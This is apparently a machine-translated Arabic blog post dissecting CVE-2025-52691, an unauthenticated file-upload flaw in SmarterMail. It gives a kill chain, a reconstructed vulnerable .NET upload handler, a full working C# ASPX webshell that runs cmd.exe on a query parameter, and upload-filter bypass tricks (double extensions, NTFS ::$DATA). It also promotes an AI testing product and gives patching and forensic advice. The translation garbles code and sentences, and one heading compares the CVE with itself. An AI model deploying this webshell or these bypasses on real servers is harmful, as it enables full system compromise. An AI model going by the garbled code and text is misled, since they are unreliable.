كابوس ليلة رأس السنة الجديدة: تشريح فيروس CVE-2025-52691 SmarterMail RCE

مع اقتراب نهاية عام 2025، يواجه مجتمع الأمن السيبراني تحديًا كارثيًا أخيرًا. في 30 ديسمبر الماضي، أصدرت وكالة الأمن السيبراني في سنغافورة (CSA) تنبيهاً خطيراً بشأن CVE-2025-52691نقطة ضعف في أدوات ذكية SmarterTools SmarterMail التي تحمل أقصى درجات الخطورة القصوى: CVSS 10.0.

بالنسبة إلى أعضاء الفريق الأحمر، تمثل هذه الثغرة الأمنية "الكأس المقدسة": وهي تحميل ملف تعسفي غير مصادق عليه تؤدي مباشرةً إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) كما النظام. وبالنسبة للفرق الزرقاء ومسؤولي النظام، فإن ذلك يمثل تهديداً مباشراً ووجودياً لسلامة البنية التحتية لاتصالات المؤسسة.

هذا ليس تجاوزًا نظريًا أو حالة سباق معقدة. إنه فشل معماري أساسي في معالجة المدخلات. تقدم هذه المقالة تحليلاً جنائيًا للثغرة الأمنية، وتشرح كيفية فشل نقاط نهاية .NET، وكيفية تعامل IIS مع الحمولات الخبيثة، وكيف يمكن للأمن الحديث القائم على الذكاء الاصطناعي تحديد هذه التهديدات قبل أن يتم تسليحها.

مشهد التهديدات: سبب اختلاف CVE-2025-52691 عن CVE-2025-52691

SmarterMail هو أحد بدائل Exchange المنتشرة على نطاق واسع، ويفضلها بشكل خاص مزودو الخدمات المدارة (MSPs) والشركات متوسطة الحجم. وهو يعمل على Windows/IIS/.NET المكدس. على عكس خوادم البريد المستندة إلى لينكس حيث قد تقيد الأذونات ضرر تحميل الملفات، فإن بيئات Windows IIS لا تتسامح مع بيئات Windows IIS.

بطاقة استخبارات الثغرات الأمنية

يكمن الخطر هنا في سطح الهجوم. خوادم البريد، بحكم تعريفها، مكشوفة للإنترنت العام. الثغرة التي لا تتطلب أي مصادقة وتوفر غلافًا مستقرًا تعني أن شبكات الروبوتات الآلية يمكنها اختراق آلاف الخوادم في غضون ساعات من إصدار PoC.

التعمق التقني: ميكانيكا الخلل

لفهم كيفية عمل CVE-2025-52691، يجب علينا تحليل كيفية تعامل SmarterMail مع طلبات HTTP. تكمن الثغرة الأمنية في نقطة نهاية محددة لواجهة برمجة التطبيقات (API) مصممة للتعامل مع مرفقات الملفات أو تحميلات المستخدم.

"حارس البوابة" المفقود

في تطبيق .NET آمن، يجب أن يتم تزيين أي ملفات معالجة إجراءات وحدة التحكم بـ [تفويض] ومنطق صارم للتحقق من صحة الملفات. توجد CVE-2025-52691 لأن معالجًا معينًا - على الأرجح معالجًا عامًا .ashx معالج أو مسار واجهة برمجة تطبيقات REST- تم كشفه بدون هذه الفحوصات.

عندما يصل طلب POST إلى نقطة النهاية هذه، يقوم الخادم بمعالجة بيانات متعددة الأجزاء/النموذج-بيانات مجرى مائي.

نمط الرمز الضعيف (المعاد بناؤه)

على الرغم من أن الكود المصدري الدقيق مسجّل الملكية، إلا أنه يمكننا إعادة بناء نمط الثغرة استنادًا إلى فئات الثغرات القياسية في .NET. يشبه الخلل على الأرجح منطق C# التالي:

C#

<public class LegacyUploadHandler : IHttpHandler { عام باطل ProcessRequest(HttpContext context) { // خطأ فادح FATAL FLAW: لا يوجد فحص لجلسة العمل أو التحقق من المصادقة // إذا (context.Session.Session["User"] == فارغ) إرجاع؛ <- مفقود

    ملف HttpPostedFile ملف HttpPostedFile = context.Request.Files["تحميل"];
    string fileName = file.FileName;

    // خطأ فادح: الوثوق بإدخال المستخدم لمسارات الملفات
    // لا يوجد فحص القائمة البيضاء لملفات .aspx و .exe و .config
    السلسلة savePath = context.Server.Server.MapPath("~/App_Data/Temp/" + fileName);

    file.SaveAs(savePath);
}

}`

خط أنابيب تنفيذ IIS

لماذا يعتبر تحميل ملف قاتل؟ في PHP، قد تحتاج إلى العبث بـ .htaccess. في Python، لا يمكنك فقط تحميل برنامج نصي وتشغيله. ولكن في ASP.NET يعمل على IIS، فإن السلوك مختلف.

إذا تمكن أحد المهاجمين من وضع ملف يحتوي على .aspx أو .ashx امتداد في دليل يسمح بتنفيذ البرامج النصية (وهو الإعداد الافتراضي لمعظم دلائل الويب)، فإن عملية عامل IIS (w3wp.exe) سيقوم بتجميع هذا الملف في الوقت المحدد (JIT) عند أول طلب HTTP إليها.

1. تحميلات المهاجمين shell.aspx.
2. طلبات المهاجمين احصل على /App_Data/Temp/shell.aspx.
3. IIS يرى الامتداد، يستدعي CLR (وقت تشغيل اللغة المشتركة).
4. CLR تجميع الشيفرة البرمجية داخل shell.aspx وينفذه.
5. تم الإنجاز.

سلسلة القتل من الاكتشاف إلى قذيفة النظام

بالنسبة لمهندس الأمن الذي يحاكي مسار الهجوم هذا، فإن سلسلة القتل تتبع أربع مراحل متميزة.

المرحلة 1: الاستطلاع

يقوم المهاجم بمسح بصمة SmarterMail.

• الرؤوس: الخادم: مايكروسوفت IIS/10.0, X-Powered-By: ASP.NET
• العنوان: تسجيل الدخول إلى البريد الذكي
• فحص نقطة النهاية: تشويش نقاط نهاية التحميل المعروفة مثل /API/v1/إعدادات/التحميل, /FileStorage/Upload.ashxأو نقاط نهاية SOAP القديمة.

المرحلة 2: التسليح

يقوم المهاجم بإنشاء "Webshell". تبدو حمولة C# التقليدية لـ "ويب شيل" كما يلي

<%@ Page Language="C#" %> <%@ Import Namespace="System.Diagnostics" %> <script runat="server"> protected void Page_Load(object sender, EventArgs e) { if (!string.IsNullOrEmpty(Request.QueryString["cmd"])) { Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.Arguments = "/c " + Request.QueryString["cmd"]; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.Start(); Response.Write(p.StandardOutput.ReadToEnd()); p.WaitForExit(); } } </script>

المرحلة 3: التسليم (الاستغلال)

يرسل المهاجم طلب POST.

• تقنية التجاوز: إذا قام الخادم بالتحقق من أنواع المحتوى، يقوم المهاجم بتعديل العنوان إلى نوع المحتوى: صورة/jpeg. إذا كان الخادم يتحقق من الامتدادات ولكن لديه خطأ منطقي (على سبيل المثال، التحقق من أول 3 أحرف فقط)، يستخدم المهاجم shell.aspx.jpg أو حيل تدفق البيانات البديلة ل NTFS (shell.aspx::$DATA).

المرحلة 4: الاستغلال

يصل المهاجم إلى القشرة:

https://mail.target.com/shell.aspx?cmd=whoami

الرد: السلطة/النظام

عند هذه النقطة، تنتهي اللعبة. يمكن للمهاجم تفريغ عملية LSASS للحصول على بيانات اعتماد المسؤول، أو تثبيت برامج الفدية، أو الانتقال إلى وحدة تحكم المجال.

دور الذكاء الاصطناعي في الكشف عن العيوب المنطقية: النهج البينليجي

من المعروف أن أدوات اختبار أمان التطبيقات الديناميكية (DAST) التقليدية سيئة السمعة في العثور على CVE-2025-52691 حشرات من الطراز. لماذا؟

1. عمى السياق: تعتمد الماسحات الضوئية على تتبع الروابط. تكون نقاط نهاية واجهة برمجة التطبيقات غير المرتبطة في HTML (نقاط النهاية المخفية) غير مرئية لهم.
2. الخوف من الدمار تتردد الماسحات الضوئية في تحميل الملفات خوفاً من تعطيل التطبيق أو تنبيه المسؤولين.

هذا هو المكان Penligent.ai يمثل نقلة نوعية لفرق الأمن الهجومي. يستخدم Penligent التحليل المنطقي القائم على الذكاء الاصطناعي بدلاً من مطابقة الأنماط البسيطة.

1. اكتشاف ما لا يمكن اكتشافه

يقوم وكلاء Penligent بتحليل حزم JavaScript من جانب العميل وحزم DLLs المترجمة (إذا كان من الممكن الوصول إليها) لإعادة بناء خريطة واجهة برمجة التطبيقات. ويستدل على وجود معالجات تحميل غير مرتبطة بشكل صريح، مما يعثر بفعالية على "واجهات برمجة التطبيقات الخفية" التي تختبئ فيها الثغرات مثل CVE-2025-52691.

2. الإثبات غير المدمر للاستغلال

بدلاً من تحميل ملف ويب خبيث، يقوم Penligent بإنشاء ملف علامة حميدة (على سبيل المثال، ملف نصي مع تجزئة عشوائية فريدة من نوعها). يحاول التحميل ثم يتحقق مما إذا كان هذا التجزئة المحددة قابلة للاسترداد عبر عنوان URL عام. وهذا يؤكد ثغرة التحميل غير المقيّد للملفات (CWE-434) مع التأكد من 100% وعدم وجود خطر استرداد أو تعطيل الخدمة.

بالنسبة لمدير أمن المعلومات، هذا يعني الفرق بين تقرير مخاطر "متوسطة" نظريًا وتقرير مخاطر "حرجة" تم التحقق منه ويتطلب تصحيحًا فوريًا.

استراتيجية المعالجة والتقوية

إذا كنت تقوم بتشغيل SmarterMail، فأنت في سباق مع الزمن.

1. الترقيع الفوري

قم بالترقية إلى الإصدار 9413 على الفور. طبقت SmarterTools عمليات تحقق صارمة من المصادقة والتحقق من صحة امتدادات الملفات المستندة إلى القائمة البيضاء في هذا الإصدار.

2. تصفية طلبات IIS (التخفيف المؤقت)

إذا لم تتمكن من التصحيح على الفور، يجب عليك حظر ناقل الهجوم على مستوى خادم الويب. استخدم تصفية طلبات IIS لمنع الوصول إلى ملفات .aspx في دلائل التحميل.

• الإجراء: في IIS Manager -> تصفية الطلبات -> علامة التبويب URL -> تسلسل الرفض.
• القاعدة: حظر الطلبات إلى /App_Data/*.aspx أو /FileStorage/*.aspx.

3. الصيد في الطب الشرعي

افترض أنك قد تكون مخترقًا بالفعل. ابحث في نظام الملفات عن:

• الملفات التي تنتهي ب .aspx, .ashx, .cer, صابون تم إنشاؤها بين 29 ديسمبر واليوم.
• سجلات IIS (u_ex*.log) لطلبات POST لطلبات POST لتحميل نقاط نهاية التحميل القادمة من عناوين IP غير معروفة، متبوعة مباشرةً بطلبات GET للملفات الجديدة.

الخاتمة

CVE-2025-52691 تذكير صارخ بأن الراحة في عالم البرمجيات غالباً ما تأتي على حساب الأمان. ففقدان واحد من التحقق من المصادقة في معالج تحميل الملفات "الثانوي" يمكن أن يجعل ملايين الدولارات من الاستثمار في جدار الحماية وبرنامج EDR عديم الفائدة.

مع انتقالنا إلى عام 2026، سيزداد تعقيد الهجمات. يجب على مهندسي الأمن تجاوز قوائم التدقيق اليدوية واعتماد أدوات التحقق المؤتمتة والذكية. وسواء كان الأمر يتعلق بالترقيع الليلة أو نشر الاختبار القائم على الذكاء الاصطناعي غداً، يظل الهدف هو نفسه: إغلاق الباب قبل أن يدخل الخصم.

مراجع موثوقة ومزيد من القراءة

• نصيحة وكالة الفضاء الكندية في سنغافورة: ثغرة أمنية حرجة في SmarterMail
• الإرشادات الأمنية وملاحظات الإصدار SmarterTools الأمنية
• MITRE CITRE CVE-2025-52691 التفاصيل
• ورقة الغش في تحميل الملفات OWASP
• أفضل الممارسات الأمنية لـ Microsoft IIS